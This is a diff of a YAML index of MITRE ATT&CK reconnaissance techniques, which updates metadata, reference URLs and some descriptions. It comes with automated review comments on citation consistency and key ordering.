@@ -55396,34 +56086,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
- type: attack-pattern
- created: '2020-10-02T16:50:12.809Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1593.002
- url: https://attack.mitre.org/techniques/T1593/002
- - source_name: SecurityTrails Google Hacking
- url: https://securitytrails.com/blog/google-hacking-techniques
- description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- - source_name: ExploitDB GoogleHacking
- url: https://www.exploit-db.com/google-hacking-database
- description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
- October 23, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T19:19:47.758Z'
name: Search Engines
description: |-
Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -55432,15 +56098,38 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+ created: '2020-10-02T16:50:12.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1593/002
+ external_id: T1593.002
+ - source_name: SecurityTrails Google Hacking
+ description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+ - source_name: ExploitDB GoogleHacking
+ description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+ October 23, 2020.
+ url: https://www.exploit-db.com/google-hacking-database
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.002:
technique:
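Review bot: the `SecurityTrails Google Hacking` reference now links to `https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks`, but its `source_name` and description (`Borges, E. (2019, March 5). Exploring Google Hacking Techniques.`) still describe the SecurityTrails article, so the citation text and the link no longer agree; the `Retrieved September 12, 2024.` bump suggests the relink was deliberate. Either keep the original article via a `web.archive.org` snapshot, as was done for `Trails-DNS` in the T1590.002 hunk, or update the description to match the page actually linked.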
@@ -55462,7 +56151,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:36:58.964Z'
name: Business Relationships
description: |-
Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -55478,8 +56167,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.003:
technique:
@@ -55540,29 +56227,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1589.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
- type: attack-pattern
- created: '2020-10-02T14:57:15.906Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1589.003
- url: https://attack.mitre.org/techniques/T1589/003
- - source_name: OPM Leak
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:09:45.795Z'
name: Employee Names
description: |-
Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
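Review bot: the only real content change in T1589.003 (the OPM Leak URL) is buried here because the whole block from `x_mitre_platforms` through `external_references` is removed and re-added in the next hunk in a different key order, roughly 40 lines of churn for one URL. If the generator now emits keys in upstream order, a stable key sort or a one-off reorder commit would keep future regenerations reviewable. The T1593.003 part of this hunk only drops `spec_version` and keeps `x_mitre_attack_spec_version: 3.0.0`, which matches the pattern elsewhere in the change.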
@@ -55571,15 +56239,34 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+ created: '2020-10-02T14:57:15.906Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1589/003
+ external_id: T1589.003
+ - source_name: OPM Leak
+ description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.004:
technique:
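Review bot: `x_mitre_deprecated: false` and `revoked: false` are emitted explicitly for T1589.003 for the first time; code that treats key absence as "active" is unaffected, but anything that filtered on key presence should be re-checked before merging. The switch of the OPM Leak reference to a web.archive.org snapshot, with the retrieved date advanced to September 16, 2024, is the one content change in the block and lines up with the `modified` value of 2024-09-16 set in the previous hunk.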
@@ -55605,7 +56292,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:35:09.668Z'
name: Client Configurations
description: |-
Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -55623,47 +56310,10 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Philip Winther
- - Sebastian Salla, McAfee
- - Robert Simmons, @MalwareUtkonos
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
- type: attack-pattern
- created: '2020-10-02T17:08:57.386Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1598.002
- url: https://attack.mitre.org/techniques/T1598/002
- - source_name: Sophos Attachment
- url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
- description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
- links – when phishers bring along their own web pages. Retrieved October
- 20, 2020.'
- - source_name: GitHub Phishery
- url: https://github.com/ryhanson/phishery
- description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
- 23, 2020.
- - source_name: Microsoft Anti Spoofing
- url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
- description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
- Retrieved October 19, 2020.
- - source_name: ACSC Email Spoofing
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- description: Australian Cyber Security Centre. (2012, December). Mitigating
- Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-05-31T04:18:44.568Z'
name: Spearphishing Attachment
description: |-
Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -55672,19 +56322,55 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Philip Winther
+ - Sebastian Salla, McAfee
+ - Robert Simmons, @MalwareUtkonos
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
accounts receiving messages from a single unusual/unknown sender. Filtering
based on DKIM+SPF or header analysis can help detect when the email sender
is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+ created: '2020-10-02T17:08:57.386Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1598/002
+ external_id: T1598.002
+ - source_name: ACSC Email Spoofing
+ description: Australian Cyber Security Centre. (2012, December). Mitigating
+ Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: Sophos Attachment
+ description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+ links – when phishers bring along their own web pages. Retrieved October
+ 20, 2020.'
+ url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+ - source_name: Microsoft Anti Spoofing
+ description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+ Retrieved October 19, 2020.
+ url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+ - source_name: GitHub Phishery
+ description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+ 23, 2020.
+ url: https://github.com/ryhanson/phishery
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.004:
technique:
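Review bot: a single `source_name` should resolve to one URL across the file; this hunk switches `ACSC Email Spoofing` to a Wayback snapshot for T1598.002, and the T1598 hunk further down makes the identical change, so please confirm no other technique still carries the live cyber.gov.au URL under that key. Separately, the reference list is now ordered by description text (ACSC, Ducklin, Microsoft, Ryan Hanson) rather than citation order; harmless for consumers, but it is why this hunk is much larger than the change it carries.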
@@ -55707,7 +56393,7 @@ reconnaissance:
description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
You Can Do About It. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:47:55.905Z'
name: CDNs
description: |-
Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -55723,8 +56409,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591:
technique:
@@ -55750,7 +56434,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.343Z'
name: Gather Victim Org Information
description: |-
Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -55766,8 +56450,6 @@ reconnaissance:
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590:
technique:
@@ -55795,7 +56477,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:23.229Z'
name: Gather Victim Network Information
description: |-
Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -55811,12 +56493,10 @@ reconnaissance:
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593:
technique:
- modified: '2022-10-18T22:48:33.286Z'
+ modified: '2024-09-12T19:19:47.759Z'
name: Search Open Websites/Domains
description: |-
Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -55825,16 +56505,16 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -55847,8 +56527,8 @@ reconnaissance:
external_id: T1593
- source_name: SecurityTrails Google Hacking
description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- url: https://securitytrails.com/blog/google-hacking-techniques
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
- source_name: Cyware Social Media
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
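Review bot: the `SecurityTrails Google Hacking` entry now points at recordedfuture.com while its `source_name` still says SecurityTrails; the key has to stay because the T1593 description cites it as `(Citation: SecurityTrails Google Hacking)`, but please confirm the new URL resolves to the same 2019 article rather than a generic landing page, since the author and date in the description are otherwise no longer attributable.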
@@ -55859,52 +56539,50 @@ reconnaissance:
url: https://www.exploit-db.com/google-hacking-database
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1597:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
- type: attack-pattern
- created: '2020-10-02T17:01:42.558Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1597
- url: https://attack.mitre.org/techniques/T1597
- - source_name: D3Secutrity CTI Feeds
- url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
- description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
- Intelligence Feeds. Retrieved October 20, 2020.
- - source_name: ZDNET Selling Data
- url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
- description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
- 73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-04T13:12:14.469Z'
name: Search Closed Sources
description: |-
- Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+ Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Barbara Louis-Sidney (OWN-CERT)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
+ type: attack-pattern
+ id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+ created: '2020-10-02T17:01:42.558Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1597
+ external_id: T1597
+ - source_name: ZDNET Selling Data
+ description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+ 73 million user records on the dark web. Retrieved October 20, 2020.
+ url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1592.003:
technique:
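Review bot: the first sentence of the T1597 description loses `(Citation: D3Secutrity CTI Feeds)` and the matching `external_references` entry (with its misspelled key) is removed, so the object stays internally consistent, but the claim about paid CTI feeds is now uncited. Please also check that no other technique in the file still emits `(Citation: D3Secutrity CTI Feeds)`, because that key no longer resolves to any reference object. The bump to `x_mitre_version: '1.1'` together with the added contributor is the expected accompaniment to a description change.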
@@ -55926,7 +56604,7 @@ reconnaissance:
url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
source code and proprietary data dumped online. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:22:46.759Z'
name: Firmware
description: |-
Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -55942,8 +56620,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.002:
technique:
@@ -55969,7 +56645,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:33:19.596Z'
name: Software
description: |-
Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -55987,8 +56663,6 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.001:
technique:
@@ -56010,7 +56684,7 @@ reconnaissance:
url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:52:40.958Z'
name: Social Media
description: |-
Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -56026,12 +56700,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.001:
technique:
- modified: '2023-04-14T23:29:10.396Z'
+ modified: '2024-10-10T13:45:01.069Z'
name: Credentials
description: "Adversaries may gather credentials that can be used during targeting.
Account credentials gathered by adversaries may be those directly associated
@@ -56041,17 +56713,20 @@ reconnaissance:
elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
Adversaries may also compromise sites then add malicious content designed
to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
- Credential information may also be exposed to adversaries via leaks to online
- or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
- breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
- Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
- GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
- may also purchase credentials from dark web or other black-markets. Finally,
- where multi-factor authentication (MFA) based on out-of-band communications
- is in use, adversaries may compromise a service provider to gain access to
- MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
- this information may reveal opportunities for other forms of reconnaissance
- (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+ (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+ Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+ GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+ based on out-of-band communications is in use, adversaries may compromise
+ a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+ Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+ adversaries via leaks to online or other accessible data sets (ex: [Search
+ Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+ repositories, etc.). Adversaries may purchase credentials from dark web markets,
+ such as Russian Market and 2easy, or through access to Telegram channels that
+ distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+ 2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+ Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+ for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
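Review bot: in the restructured description the run of citations from `(Citation: Register Deloitte)` through `(Citation: CNET Leaks)` now trails the ScanBox sentence about harvesting cookies, while the sentence those sources actually support (credentials exposed via search engines, breach dumps and code repositories) moves to the next paragraph carrying only the new infostealer citations. This is upstream text, so the correction belongs in ATT&CK rather than in this repo, but it is worth flagging because citation placement drives how the rendered page attributes each claim. The three new keys (`Bleeping Computer 2easy 2021`, `SecureWorks Infostealers 2023`, `Bleeping Computer Stealer Logs 2023`) each get a reference entry in the later hunks, so nothing dangles.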
@@ -56063,6 +56738,7 @@ reconnaissance:
- Vinayak Wadhwa, Lucideus
- Lee Christensen, SpecterOps
- Toby Kohlenberg
+ - Massimo Giaimo, Würth Group Cyber Defence Center
x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -56073,7 +56749,7 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
created: '2020-10-02T14:55:43.815Z'
@@ -56083,6 +56759,10 @@ reconnaissance:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1589/001
external_id: T1589.001
+ - source_name: Bleeping Computer 2easy 2021
+ description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+ web marketplace for stolen data. Retrieved October 7, 2024.
+ url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
- source_name: ATT ScanBox
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
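Review bot: the new `Bleeping Computer 2easy 2021` entry uses the author form `Bill Toulas.` where neighbouring references use surname-first (`Blasco, J.`, `Seals, T.`); `Dylan Ayrey.` just below shows the inconsistency predates this change, so it is an upstream style issue rather than something for the generator. The ordering is by description text, which is why `Bill Toulas` lands ahead of `Blasco, J.`; a one-line comment in the generator explaining that would stop the next reader from trying to "fix" it.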
@@ -56095,6 +56775,10 @@ reconnaissance:
description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
19, 2020.
